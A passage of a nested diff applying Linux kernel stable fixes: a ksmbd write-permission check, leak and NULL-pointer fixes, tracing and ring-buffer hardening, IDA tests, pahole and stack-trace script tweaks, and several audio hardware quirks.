+ 		rsp = smb2_get_msg(work->response_buf);
+ 	}
+ 
++	if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
++		ksmbd_debug(SMB, "User does not have write permission\n");
++		pr_err("User does not have write permission\n");
++		rc = -EACCES;
++		goto err_out;
++	}
++
+ 	if (!has_file_id(id)) {
+ 		id = req->VolatileFileId;
+ 		pid = req->PersistentFileId;
+diff --git a/fs/smb/server/smbacl.c b/fs/smb/server/smbacl.c
+index d9bbd2eb89c35..6fd3560028d3a 100644
+--- a/fs/smb/server/smbacl.c
++++ b/fs/smb/server/smbacl.c
+@@ -401,10 +401,6 @@ static void parse_dacl(struct user_namespace *user_ns,
+ 	if (num_aces > ULONG_MAX / sizeof(struct smb_ace *))
+ 		return;
+ 
+-	ppace = kmalloc_array(num_aces, sizeof(struct smb_ace *), GFP_KERNEL);
+-	if (!ppace)
+-		return;
+-
+ 	ret = init_acl_state(&acl_state, num_aces);
+ 	if (ret)
+ 		return;
+@@ -414,6 +410,13 @@ static void parse_dacl(struct user_namespace *user_ns,
+ 		return;
+ 	}
+ 
++	ppace = kmalloc_array(num_aces, sizeof(struct smb_ace *), GFP_KERNEL);
++	if (!ppace) {
++		free_acl_state(&default_acl_state);
++		free_acl_state(&acl_state);
++		return;
++	}
++
+ 	/*
+ 	 * reset rwx permissions for user/group/other.
+ 	 * Also, if num_aces is 0 i.e. DACL has no ACEs,
+diff --git a/include/linux/ieee80211.h b/include/linux/ieee80211.h
+index 870ae4cd82029..dce105f67b4d8 100644
+--- a/include/linux/ieee80211.h
++++ b/include/linux/ieee80211.h
+@@ -2658,12 +2658,14 @@ ieee80211_he_oper_size(const u8 *he_oper_ie)
+ static inline const struct ieee80211_he_6ghz_oper *
+ ieee80211_he_6ghz_oper(const struct ieee80211_he_operation *he_oper)
+ {
+-	const u8 *ret = (const void *)&he_oper->optional;
++	const u8 *ret;
+ 	u32 he_oper_params;
+ 
+ 	if (!he_oper)
+ 		return NULL;
+ 
++	ret = (const void *)&he_oper->optional;
++
+ 	he_oper_params = le32_to_cpu(he_oper->he_oper_params);
+ 
+ 	if (!(he_oper_params & IEEE80211_HE_OPERATION_6GHZ_OP_INFO))
+diff --git a/include/linux/jbd2.h b/include/linux/jbd2.h
+index ebb1608d9dcd2..6611af5f1d0c6 100644
+--- a/include/linux/jbd2.h
++++ b/include/linux/jbd2.h
+@@ -1374,6 +1374,9 @@ JBD2_FEATURE_INCOMPAT_FUNCS(csum2,		CSUM_V2)
+ JBD2_FEATURE_INCOMPAT_FUNCS(csum3,		CSUM_V3)
+ JBD2_FEATURE_INCOMPAT_FUNCS(fast_commit,	FAST_COMMIT)
+ 
++/* Journal high priority write IO operation flags */
++#define JBD2_JOURNAL_REQ_FLAGS		(REQ_META | REQ_SYNC | REQ_IDLE)
++
+ /*
+  * Journal flag definitions
+  */
+diff --git a/init/Kconfig b/init/Kconfig
+index de255842f5d09..148704640252e 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -1914,7 +1914,7 @@ config RUST
+ 	depends on !MODVERSIONS
+ 	depends on !GCC_PLUGINS
+ 	depends on !RANDSTRUCT
+-	depends on !DEBUG_INFO_BTF
++	depends on !DEBUG_INFO_BTF || PAHOLE_HAS_LANG_EXCLUDE
+ 	select CONSTRUCTORS
+ 	help
+ 	  Enables Rust support in the kernel.
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 71cad4f1323c6..1285e7fb597ee 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -3644,6 +3644,12 @@ rb_reserve_next_event(struct trace_buffer *buffer,
+ 	int nr_loops = 0;
+ 	int add_ts_default;
+ 
++	/* ring buffer does cmpxchg, make sure it is safe in NMI context */
++	if (!IS_ENABLED(CONFIG_ARCH_HAVE_NMI_SAFE_CMPXCHG) &&
++	    (unlikely(in_nmi()))) {
++		return NULL;
++	}
++
+ 	rb_start_commit(cpu_buffer);
+ 	/* The commit page can not change after this */
+ 
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index deae65af76ecf..2b3c4cd8382b3 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -4679,7 +4679,11 @@ static int s_show(struct seq_file *m, void *v)
+ 		iter->leftover = ret;
+ 
+ 	} else {
+-		print_trace_line(iter);
++		ret = print_trace_line(iter);
++		if (ret == TRACE_TYPE_PARTIAL_LINE) {
++			iter->seq.full = 0;
++			trace_seq_puts(&iter->seq, "[LINE TOO BIG]\n");
++		}
+ 		ret = trace_print_seq(m, &iter->seq);
+ 		/*
+ 		 * If we overflow the seq_file buffer, then it will
+@@ -4912,6 +4916,12 @@ int tracing_release_file_tr(struct inode *inode, struct file *filp)
+ 	return 0;
+ }
+ 
++int tracing_single_release_file_tr(struct inode *inode, struct file *filp)
++{
++	tracing_release_file_tr(inode, filp);
++	return single_release(inode, filp);
++}
++
+ static int tracing_mark_open(struct inode *inode, struct file *filp)
+ {
+ 	stream_open(inode, filp);
+diff --git a/kernel/trace/trace.h b/kernel/trace/trace.h
+index 10aaafa2936dc..aad7fcd84617c 100644
+--- a/kernel/trace/trace.h
++++ b/kernel/trace/trace.h
+@@ -592,6 +592,7 @@ int tracing_open_generic(struct inode *inode, struct file *filp);
+ int tracing_open_generic_tr(struct inode *inode, struct file *filp);
+ int tracing_open_file_tr(struct inode *inode, struct file *filp);
+ int tracing_release_file_tr(struct inode *inode, struct file *filp);
++int tracing_single_release_file_tr(struct inode *inode, struct file *filp);
+ bool tracing_is_disabled(void);
+ bool tracer_tracing_is_on(struct trace_array *tr);
+ void tracer_tracing_on(struct trace_array *tr);
+diff --git a/kernel/trace/trace_events_hist.c b/kernel/trace/trace_events_hist.c
+index 1470af2190735..3b0da1bddf633 100644
+--- a/kernel/trace/trace_events_hist.c
++++ b/kernel/trace/trace_events_hist.c
+@@ -5532,10 +5532,12 @@ static int event_hist_open(struct inode *inode, struct file *file)
+ {
+ 	int ret;
+ 
+-	ret = security_locked_down(LOCKDOWN_TRACEFS);
++	ret = tracing_open_file_tr(inode, file);
+ 	if (ret)
+ 		return ret;
+ 
++	/* Clear private_data to avoid warning in single_open() */
++	file->private_data = NULL;
+ 	return single_open(file, hist_show, file);
+ }
+ 
+@@ -5543,7 +5545,7 @@ const struct file_operations event_hist_fops = {
+ 	.open = event_hist_open,
+ 	.read = seq_read,
+ 	.llseek = seq_lseek,
+-	.release = single_release,
++	.release = tracing_single_release_file_tr,
+ };
+ 
+ #ifdef CONFIG_HIST_TRIGGERS_DEBUG
+@@ -5809,10 +5811,12 @@ static int event_hist_debug_open(struct inode *inode, struct file *file)
+ {
+ 	int ret;
+ 
+-	ret = security_locked_down(LOCKDOWN_TRACEFS);
++	ret = tracing_open_file_tr(inode, file);
+ 	if (ret)
+ 		return ret;
+ 
++	/* Clear private_data to avoid warning in single_open() */
++	file->private_data = NULL;
+ 	return single_open(file, hist_debug_show, file);
+ }
+ 
+@@ -5820,7 +5824,7 @@ const struct file_operations event_hist_debug_fops = {
+ 	.open = event_hist_debug_open,
+ 	.read = seq_read,
+ 	.llseek = seq_lseek,
+-	.release = single_release,
++	.release = tracing_single_release_file_tr,
+ };
+ #endif
+ 
+diff --git a/kernel/trace/trace_output.c b/kernel/trace/trace_output.c
+index 5cd4fb6563068..bf1965b180992 100644
+--- a/kernel/trace/trace_output.c
++++ b/kernel/trace/trace_output.c
+@@ -1445,11 +1445,12 @@ static enum print_line_t trace_print_print(struct trace_iterator *iter,
+ {
+ 	struct print_entry *field;
+ 	struct trace_seq *s = &iter->seq;
++	int max = iter->ent_size - offsetof(struct print_entry, buf);
+ 
+ 	trace_assign_type(field, iter->ent);
+ 
+ 	seq_print_ip_sym(s, field->ip, flags);
+-	trace_seq_printf(s, ": %s", field->buf);
++	trace_seq_printf(s, ": %.*s", max, field->buf);
+ 
+ 	return trace_handle_return(s);
+ }
+@@ -1458,10 +1459,11 @@ static enum print_line_t trace_print_raw(struct trace_iterator *iter, int flags,
+ 					 struct trace_event *event)
+ {
+ 	struct print_entry *field;
++	int max = iter->ent_size - offsetof(struct print_entry, buf);
+ 
+ 	trace_assign_type(field, iter->ent);
+ 
+-	trace_seq_printf(&iter->seq, "# %lx %s", field->ip, field->buf);
++	trace_seq_printf(&iter->seq, "# %lx %.*s", field->ip, max, field->buf);
+ 
+ 	return trace_handle_return(&iter->seq);
+ }
+diff --git a/lib/Kconfig.debug b/lib/Kconfig.debug
+index 4db0199651f56..95541b99aa8ea 100644
+--- a/lib/Kconfig.debug
++++ b/lib/Kconfig.debug
+@@ -364,6 +364,15 @@ config PAHOLE_HAS_BTF_TAG
+ 	  btf_decl_tag) or not. Currently only clang compiler implements
+ 	  these attributes, so make the config depend on CC_IS_CLANG.
+ 
++config PAHOLE_HAS_LANG_EXCLUDE
++	def_bool PAHOLE_VERSION >= 124
++	help
++	  Support for the --lang_exclude flag which makes pahole exclude
++	  compilation units from the supplied language. Used in Kbuild to
++	  omit Rust CUs which are not supported in version 1.24 of pahole,
++	  otherwise it would emit malformed kernel and module binaries when
++	  using DEBUG_INFO_BTF_MODULES.
++
+ config DEBUG_INFO_BTF_MODULES
+ 	def_bool y
+ 	depends on DEBUG_INFO_BTF && MODULES && PAHOLE_HAS_SPLIT_BTF
+diff --git a/lib/idr.c b/lib/idr.c
+index 13f2758c23773..da36054c3ca02 100644
+--- a/lib/idr.c
++++ b/lib/idr.c
+@@ -508,7 +508,7 @@ void ida_free(struct ida *ida, unsigned int id)
+ 			goto delete;
+ 		xas_store(&xas, xa_mk_value(v));
+ 	} else {
+-		if (!test_bit(bit, bitmap->bitmap))
++		if (!bitmap || !test_bit(bit, bitmap->bitmap))
+ 			goto err;
+ 		__clear_bit(bit, bitmap->bitmap);
+ 		xas_set_mark(&xas, XA_FREE_MARK);
+diff --git a/lib/test_ida.c b/lib/test_ida.c
+index b068806259615..55105baa19da9 100644
+--- a/lib/test_ida.c
++++ b/lib/test_ida.c
+@@ -150,6 +150,45 @@ static void ida_check_conv(struct ida *ida)
+ 	IDA_BUG_ON(ida, !ida_is_empty(ida));
+ }
+ 
++/*
++ * Check various situations where we attempt to free an ID we don't own.
++ */
++static void ida_check_bad_free(struct ida *ida)
++{
++	unsigned long i;
++
++	printk("vvv Ignore \"not allocated\" warnings\n");
++	/* IDA is empty; all of these will fail */
++	ida_free(ida, 0);
++	for (i = 0; i < 31; i++)
++		ida_free(ida, 1 << i);
++
++	/* IDA contains a single value entry */
++	IDA_BUG_ON(ida, ida_alloc_min(ida, 3, GFP_KERNEL) != 3);
++	ida_free(ida, 0);
++	for (i = 0; i < 31; i++)
++		ida_free(ida, 1 << i);
++
++	/* IDA contains a single bitmap */
++	IDA_BUG_ON(ida, ida_alloc_min(ida, 1023, GFP_KERNEL) != 1023);
++	ida_free(ida, 0);
++	for (i = 0; i < 31; i++)
++		ida_free(ida, 1 << i);
++
++	/* IDA contains a tree */
++	IDA_BUG_ON(ida, ida_alloc_min(ida, (1 << 20) - 1, GFP_KERNEL) != (1 << 20) - 1);
++	ida_free(ida, 0);
++	for (i = 0; i < 31; i++)
++		ida_free(ida, 1 << i);
++	printk("^^^ \"not allocated\" warnings over\n");
++
++	ida_free(ida, 3);
++	ida_free(ida, 1023);
++	ida_free(ida, (1 << 20) - 1);
++
++	IDA_BUG_ON(ida, !ida_is_empty(ida));
++}
++
+ static DEFINE_IDA(ida);
+ 
+ static int ida_checks(void)
+@@ -162,6 +201,7 @@ static int ida_checks(void)
+ 	ida_check_leaf(&ida, 1024 * 64);
+ 	ida_check_max(&ida);
+ 	ida_check_conv(&ida);
++	ida_check_bad_free(&ida);
+ 
+ 	printk("IDA: %u of %u tests passed\n", tests_passed, tests_run);
+ 	return (tests_run != tests_passed) ? 0 : -EINVAL;
+diff --git a/net/core/neighbour.c b/net/core/neighbour.c
+index 41daa47d03934..c842f150c3048 100644
+--- a/net/core/neighbour.c
++++ b/net/core/neighbour.c
+@@ -253,9 +253,11 @@ static int neigh_forced_gc(struct neigh_table *tbl)
+ {
+ 	int max_clean = atomic_read(&tbl->gc_entries) -
+ 			READ_ONCE(tbl->gc_thresh2);
++	u64 tmax = ktime_get_ns() + NSEC_PER_MSEC;
+ 	unsigned long tref = jiffies - 5 * HZ;
+ 	struct neighbour *n, *tmp;
+ 	int shrunk = 0;
++	int loop = 0;
+ 
+ 	NEIGH_CACHE_STAT_INC(tbl, forced_gc_runs);
+ 
+@@ -278,11 +280,16 @@ static int neigh_forced_gc(struct neigh_table *tbl)
+ 				shrunk++;
+ 			if (shrunk >= max_clean)
+ 				break;
++			if (++loop == 16) {
++				if (ktime_get_ns() > tmax)
++					goto unlock;
++				loop = 0;
++			}
+ 		}
+ 	}
+ 
+ 	WRITE_ONCE(tbl->last_flush, jiffies);
+-
++unlock:
+ 	write_unlock_bh(&tbl->lock);
+ 
+ 	return shrunk;
+diff --git a/net/mac80211/ht.c b/net/mac80211/ht.c
+index ae42e956eff5a..9bfe128ada47d 100644
+--- a/net/mac80211/ht.c
++++ b/net/mac80211/ht.c
+@@ -271,6 +271,7 @@ bool ieee80211_ht_cap_ie_to_sta_ht_cap(struct ieee80211_sub_if_data *sdata,
+ 	case NL80211_CHAN_WIDTH_80:
+ 	case NL80211_CHAN_WIDTH_80P80:
+ 	case NL80211_CHAN_WIDTH_160:
++	case NL80211_CHAN_WIDTH_320:
+ 		bw = ht_cap.cap & IEEE80211_HT_CAP_SUP_WIDTH_20_40 ?
+ 				IEEE80211_STA_RX_BW_40 : IEEE80211_STA_RX_BW_20;
+ 		break;
+diff --git a/net/mptcp/options.c b/net/mptcp/options.c
+index 0c786ceda5ee6..74027bb5b4296 100644
+--- a/net/mptcp/options.c
++++ b/net/mptcp/options.c
+@@ -103,6 +103,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 			mp_opt->suboptions |= OPTION_MPTCP_DSS;
+ 			mp_opt->use_map = 1;
+ 			mp_opt->mpc_map = 1;
++			mp_opt->use_ack = 0;
+ 			mp_opt->data_len = get_unaligned_be16(ptr);
+ 			ptr += 2;
+ 		}
+diff --git a/net/qrtr/ns.c b/net/qrtr/ns.c
+index 3e40a1ba48f79..4a13b9f7abb44 100644
+--- a/net/qrtr/ns.c
++++ b/net/qrtr/ns.c
+@@ -569,7 +569,9 @@ static int ctrl_cmd_del_server(struct sockaddr_qrtr *from,
+ 	if (!node)
+ 		return -ENOENT;
+ 
+-	return server_del(node, port, true);
++	server_del(node, port, true);
++
++	return 0;
+ }
+ 
+ static int ctrl_cmd_new_lookup(struct sockaddr_qrtr *from,
+diff --git a/net/wireless/core.c b/net/wireless/core.c
+index 63d75fecc2c53..8809e668ed912 100644
+--- a/net/wireless/core.c
++++ b/net/wireless/core.c
+@@ -216,7 +216,9 @@ static void cfg80211_rfkill_poll(struct rfkill *rfkill, void *data)
+ {
+ 	struct cfg80211_registered_device *rdev = data;
+ 
++	wiphy_lock(&rdev->wiphy);
+ 	rdev_rfkill_poll(rdev);
++	wiphy_unlock(&rdev->wiphy);
+ }
+ 
+ void cfg80211_stop_p2p_device(struct cfg80211_registered_device *rdev,
+diff --git a/scripts/decode_stacktrace.sh b/scripts/decode_stacktrace.sh
+index 564c5632e1a24..bfe5a4082d8ea 100755
+--- a/scripts/decode_stacktrace.sh
++++ b/scripts/decode_stacktrace.sh
+@@ -16,6 +16,21 @@ elif type c++filt >/dev/null 2>&1 ; then
+ 	cppfilt_opts=-i
+ fi
+ 
++UTIL_SUFFIX=
++if [[ -z ${LLVM:-} ]]; then
++	UTIL_PREFIX=${CROSS_COMPILE:-}
++else
++	UTIL_PREFIX=llvm-
++	if [[ ${LLVM} == */ ]]; then
++		UTIL_PREFIX=${LLVM}${UTIL_PREFIX}
++	elif [[ ${LLVM} == -* ]]; then
++		UTIL_SUFFIX=${LLVM}
++	fi
++fi
++
++READELF=${UTIL_PREFIX}readelf${UTIL_SUFFIX}
++ADDR2LINE=${UTIL_PREFIX}addr2line${UTIL_SUFFIX}
++
+ if [[ $1 == "-r" ]] ; then
+ 	vmlinux=""
+ 	basepath="auto"
+@@ -75,7 +90,7 @@ find_module() {
+ 
+ 	if [[ "$modpath" != "" ]] ; then
+ 		for fn in $(find "$modpath" -name "${module//_/[-_]}.ko*") ; do
+-			if readelf -WS "$fn" | grep -qwF .debug_line ; then
++			if ${READELF} -WS "$fn" | grep -qwF .debug_line ; then
+ 				echo $fn
+ 				return
+ 			fi
+@@ -169,7 +184,7 @@ parse_symbol() {
+ 	if [[ $aarray_support == true && "${cache[$module,$address]+isset}" == "isset" ]]; then
+ 		local code=${cache[$module,$address]}
+ 	else
+-		local code=$(${CROSS_COMPILE}addr2line -i -e "$objfile" "$address" 2>/dev/null)
++		local code=$(${ADDR2LINE} -i -e "$objfile" "$address" 2>/dev/null)
+ 		if [[ $aarray_support == true ]]; then
+ 			cache[$module,$address]=$code
+ 		fi
+diff --git a/scripts/pahole-flags.sh b/scripts/pahole-flags.sh
+index 0d99ef17e4a52..728d55190d97a 100755
+--- a/scripts/pahole-flags.sh
++++ b/scripts/pahole-flags.sh
+@@ -19,5 +19,12 @@ fi
+ if [ "${pahole_ver}" -ge "122" ]; then
+ 	extra_paholeopt="${extra_paholeopt} -j"
+ fi
++if [ "${pahole_ver}" -ge "124" ]; then
++	# see PAHOLE_HAS_LANG_EXCLUDE
++	extra_paholeopt="${extra_paholeopt} --lang_exclude=rust"
++fi
++if [ "${pahole_ver}" -ge "125" ]; then
++	extra_paholeopt="${extra_paholeopt} --skip_encoding_btf_inconsistent_proto --btf_gen_optimized"
++fi
+ 
+ echo ${extra_paholeopt}
+diff --git a/sound/hda/intel-nhlt.c b/sound/hda/intel-nhlt.c
+index 2c4dfc0b7e342..696a958d93e9c 100644
+--- a/sound/hda/intel-nhlt.c
++++ b/sound/hda/intel-nhlt.c
+@@ -238,7 +238,7 @@ EXPORT_SYMBOL(intel_nhlt_ssp_mclk_mask);
+ 
+ static struct nhlt_specific_cfg *
+ nhlt_get_specific_cfg(struct device *dev, struct nhlt_fmt *fmt, u8 num_ch,
+-		      u32 rate, u8 vbps, u8 bps)
++		      u32 rate, u8 vbps, u8 bps, bool ignore_vbps)
+ {
+ 	struct nhlt_fmt_cfg *cfg = fmt->fmt_config;
+ 	struct wav_fmt *wfmt;
+@@ -255,8 +255,12 @@ nhlt_get_specific_cfg(struct device *dev, struct nhlt_fmt *fmt, u8 num_ch,
+ 		dev_dbg(dev, "Endpoint format: ch=%d fmt=%d/%d rate=%d\n",
+ 			wfmt->channels, _vbps, _bps, wfmt->samples_per_sec);
+ 
++		/*
++		 * When looking for exact match of configuration ignore the vbps
++		 * from NHLT table when ignore_vbps is true
++		 */
+ 		if (wfmt->channels == num_ch && wfmt->samples_per_sec == rate &&
+-		    vbps == _vbps && bps == _bps)
++		    (ignore_vbps || vbps == _vbps) && bps == _bps)
+ 			return &cfg->config;
+ 
+ 		cfg = (struct nhlt_fmt_cfg *)(cfg->config.caps + cfg->config.size);
+@@ -289,6 +293,7 @@ intel_nhlt_get_endpoint_blob(struct device *dev, struct nhlt_acpi_table *nhlt,
+ {
+ 	struct nhlt_specific_cfg *cfg;
+ 	struct nhlt_endpoint *epnt;
++	bool ignore_vbps = false;
+ 	struct nhlt_fmt *fmt;
+ 	int i;
+ 
+@@ -298,7 +303,26 @@ intel_nhlt_get_endpoint_blob(struct device *dev, struct nhlt_acpi_table *nhlt,
+ 	dev_dbg(dev, "Looking for configuration:\n");
+ 	dev_dbg(dev, "  vbus_id=%d link_type=%d dir=%d, dev_type=%d\n",
+ 		bus_id, link_type, dir, dev_type);
+-	dev_dbg(dev, "  ch=%d fmt=%d/%d rate=%d\n", num_ch, vbps, bps, rate);
++	if (link_type == NHLT_LINK_DMIC && bps == 32 && (vbps == 24 || vbps == 32)) {
++		/*
++		 * The DMIC hardware supports only one type of 32 bits sample
++		 * size, which is 24 bit sampling on the MSB side and bits[1:0]
++		 * are used for indicating the channel number.
++		 * It has been observed that some NHLT tables have the vbps
++		 * specified as 32 while some uses 24.
++		 * The format these variations describe are identical, the
++		 * hardware is configured and behaves the same way.
++		 * Note: when the samples assumed to be vbps=32 then the 'noise'
++		 * introduced by the lower two bits (channel number) have no
++		 * real life implication on audio quality.
++		 */
++		dev_dbg(dev,
++			"  ch=%d fmt=%d rate=%d (vbps is ignored for DMIC 32bit format)\n",
++			num_ch, bps, rate);
++		ignore_vbps = true;
++	} else {
++		dev_dbg(dev, "  ch=%d fmt=%d/%d rate=%d\n", num_ch, vbps, bps, rate);
++	}
+ 	dev_dbg(dev, "Endpoint count=%d\n", nhlt->endpoint_count);
+ 
+ 	epnt = (struct nhlt_endpoint *)nhlt->desc;
+@@ -307,7 +331,8 @@ intel_nhlt_get_endpoint_blob(struct device *dev, struct nhlt_acpi_table *nhlt,
+ 		if (nhlt_check_ep_match(dev, epnt, bus_id, link_type, dir, dev_type)) {
+ 			fmt = (struct nhlt_fmt *)(epnt->config.caps + epnt->config.size);
+ 
+-			cfg = nhlt_get_specific_cfg(dev, fmt, num_ch, rate, vbps, bps);
++			cfg = nhlt_get_specific_cfg(dev, fmt, num_ch, rate,
++						    vbps, bps, ignore_vbps);
+ 			if (cfg)
+ 				return cfg;
+ 		}
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 1c8ffc5cf97f6..5efb3adee48d9 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -7108,6 +7108,7 @@ enum {
+ 	ALC290_FIXUP_SUBWOOFER_HSJACK,
+ 	ALC269_FIXUP_THINKPAD_ACPI,
+ 	ALC269_FIXUP_DMIC_THINKPAD_ACPI,
++	ALC269VB_FIXUP_CHUWI_COREBOOK_XPRO,
+ 	ALC255_FIXUP_ACER_MIC_NO_PRESENCE,
+ 	ALC255_FIXUP_ASUS_MIC_NO_PRESENCE,
+ 	ALC255_FIXUP_DELL1_MIC_NO_PRESENCE,
+@@ -7454,6 +7455,14 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc269_fixup_pincfg_U7x7_headset_mic,
+ 	},
++	[ALC269VB_FIXUP_CHUWI_COREBOOK_XPRO] = {
++		.type = HDA_FIXUP_PINS,
++		.v.pins = (const struct hda_pintbl[]) {
++			{ 0x18, 0x03a19020 }, /* headset mic */
++			{ 0x1b, 0x90170150 }, /* speaker */
++			{ }
++		},
++	},
+ 	[ALC269_FIXUP_AMIC] = {
+ 		.type = HDA_FIXUP_PINS,
+ 		.v.pins = (const struct hda_pintbl[]) {
+@@ -9598,6 +9607,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8735, "HP ProBook 435 G7", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8736, "HP", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x8760, "HP", ALC285_FIXUP_HP_MUTE_LED),
++	SND_PCI_QUIRK(0x103c, 0x876e, "HP ENVY x360 Convertible 13-ay0xxx", ALC245_FIXUP_HP_X360_MUTE_LEDS),
+ 	SND_PCI_QUIRK(0x103c, 0x877a, "HP", ALC285_FIXUP_HP_MUTE_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x877d, "HP", ALC236_FIXUP_HP_MUTE_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8780, "HP ZBook Fury 17 G7 Mobile Workstation",
+@@ -9770,17 +9780,20 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1d1f, "ASUS ROG Strix G17 2023 (G713PV)", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1d42, "ASUS Zephyrus G14 2022", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x1d4e, "ASUS TM420", ALC256_FIXUP_ASUS_HPE),
++	SND_PCI_QUIRK(0x1043, 0x1da2, "ASUS UP6502ZA/ZD", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1e02, "ASUS UX3402ZA", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x16a3, "ASUS UX3402VA", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1f62, "ASUS UX7602ZM", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1e11, "ASUS Zephyrus G15", ALC289_FIXUP_ASUS_GA502),
+-	SND_PCI_QUIRK(0x1043, 0x1e12, "ASUS UM3402", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x1043, 0x1e12, "ASUS UM6702RA/RC", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1e51, "ASUS Zephyrus M15", ALC294_FIXUP_ASUS_GU502_PINS),
+ 	SND_PCI_QUIRK(0x1043, 0x1e5e, "ASUS ROG Strix G513", ALC294_FIXUP_ASUS_G513_PINS),
+ 	SND_PCI_QUIRK(0x1043, 0x1e8e, "ASUS Zephyrus G15", ALC289_FIXUP_ASUS_GA401),
++	SND_PCI_QUIRK(0x1043, 0x1ee2, "ASUS UM3402", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1c52, "ASUS Zephyrus G15 2022", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x1f11, "ASUS Zephyrus G14", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x1f12, "ASUS UM5302", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x1043, 0x1f62, "ASUS UX7602ZM", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1f92, "ASUS ROG Flow X16", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x3030, "ASUS ZN270IE", ALC256_FIXUP_ASUS_AIO_GPIO2),
+ 	SND_PCI_QUIRK(0x1043, 0x3a20, "ASUS G614JZR", ALC245_FIXUP_CS35L41_SPI_2),
+@@ -10032,6 +10045,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1d72, 0x1901, "RedmiBook 14", ALC256_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1d72, 0x1945, "Redmi G", ALC256_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1d72, 0x1947, "RedmiBook Air", ALC255_FIXUP_XIAOMI_HEADSET_MIC),
++	SND_PCI_QUIRK(0x2782, 0x0232, "CHUWI CoreBook XPro", ALC269VB_FIXUP_CHUWI_COREBOOK_XPRO),
+ 	SND_PCI_QUIRK(0x8086, 0x2074, "Intel NUC 8", ALC233_FIXUP_INTEL_NUC8_DMIC),
+ 	SND_PCI_QUIRK(0x8086, 0x2080, "Intel NUC 8 Rugged", ALC256_FIXUP_INTEL_NUC8_RUGGED),
+ 	SND_PCI_QUIRK(0x8086, 0x2081, "Intel NUC 10", ALC256_FIXUP_INTEL_NUC10),
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 1dde1f3196acc..808d002826233 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -353,6 +353,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_VERSION, "pang12"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "System76"),
++			DMI_MATCH(DMI_PRODUCT_VERSION, "pang13"),
++		}
++	},
+ 	{}
+ };
+ 
+diff --git a/sound/soc/codecs/cs43130.c b/sound/soc/codecs/cs43130.c
+index db39abb2a31b5..0b8ecd917a086 100644
+--- a/sound/soc/codecs/cs43130.c
++++ b/sound/soc/codecs/cs43130.c
+@@ -579,7 +579,7 @@ static int cs43130_set_sp_fmt(int dai_id, unsigned int bitwidth_sclk,
+ 		break;
+ 	case SND_SOC_DAIFMT_LEFT_J:
+ 		hi_size = bitwidth_sclk;
+-		frm_delay = 2;
++		frm_delay = 0;
+ 		frm_phase = 1;
+ 		break;
+ 	case SND_SOC_DAIFMT_DSP_A:
+@@ -1683,7 +1683,7 @@ static ssize_t hpload_dc_r_show(struct device *dev,
+ 	return cs43130_show_dc(dev, buf, HP_RIGHT);
+ }
+ 
+-static u16 const cs43130_ac_freq[CS43130_AC_FREQ] = {
++static const u16 cs43130_ac_freq[CS43130_AC_FREQ] = {
+ 	24,
+ 	43,
+ 	93,
+@@ -2363,7 +2363,7 @@ static const struct regmap_config cs43130_regmap = {
+ 	.use_single_write	= true,
+ };
+ 
+-static u16 const cs43130_dc_threshold[CS43130_DC_THRESHOLD] = {
++static const u16 cs43130_dc_threshold[CS43130_DC_THRESHOLD] = {
+ 	50,
+ 	120,
+ };
+diff --git a/sound/soc/codecs/da7219-aad.c b/sound/soc/codecs/da7219-aad.c
+index 9251490548e8c..c8410769188a0 100644
+--- a/sound/soc/codecs/da7219-aad.c
++++ b/sound/soc/codecs/da7219-aad.c
